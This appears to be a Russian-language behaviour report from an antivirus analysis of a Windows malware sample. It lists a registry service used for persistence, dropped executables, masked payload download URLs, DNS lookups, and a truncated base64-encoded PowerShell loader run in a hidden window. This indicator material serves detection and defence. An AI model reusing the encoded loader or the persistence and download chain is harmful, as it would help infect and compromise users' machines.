Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\P2P] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\P2P] 'ImagePath' = '"%WINDIR%\SysWOW64\dmime\P2P.exe"'
- 'P2P' "%WINDIR%\SysWOW64\dmime\P2P.exe"
- 'P2P' %WINDIR%\SysWOW64\dmime\P2P.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AGUAYQB2AGgAbwBvAHcAcABhAHQAdABhAHUAbAA9ACcAdABhAG8AdgBqAG8AeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIASQBUAGAAeQBQAHIAYABvAHQAYABPAE...
- %HOMEPATH%\60.exe
- %WINDIR%\syswow64\dmime\p2p.exe
- %HOMEPATH%\60.exe в %WINDIR%\syswow64\dmime\p2p.exe
- '17#.73.0.98':443
- http://ri###ahl.com/wp-includes/Z8eS6748/
- http://www.gv##tz.com/4LH419348/
- http://in###mal.com/eazylot.com/zy/
- http://17#.#3.0.98:443/Q52lPx9GFvOEkGF/XVmgGKjDccf/ via 17#.73.0.98
- DNS ASK ri###ahl.com
- DNS ASK gv##tz.com
- DNS ASK in###mal.com
- '%HOMEPATH%\60.exe'
- '%WINDIR%\syswow64\dmime\p2p.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AGUAYQB2AGgAbwBvAHcAcABhAHQAdABhAHUAbAA9ACcAdABhAG8AdgBqAG8AeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIASQBUAGAAeQBQAHIAYABvAHQAYABPAE...' (со скрытым окном)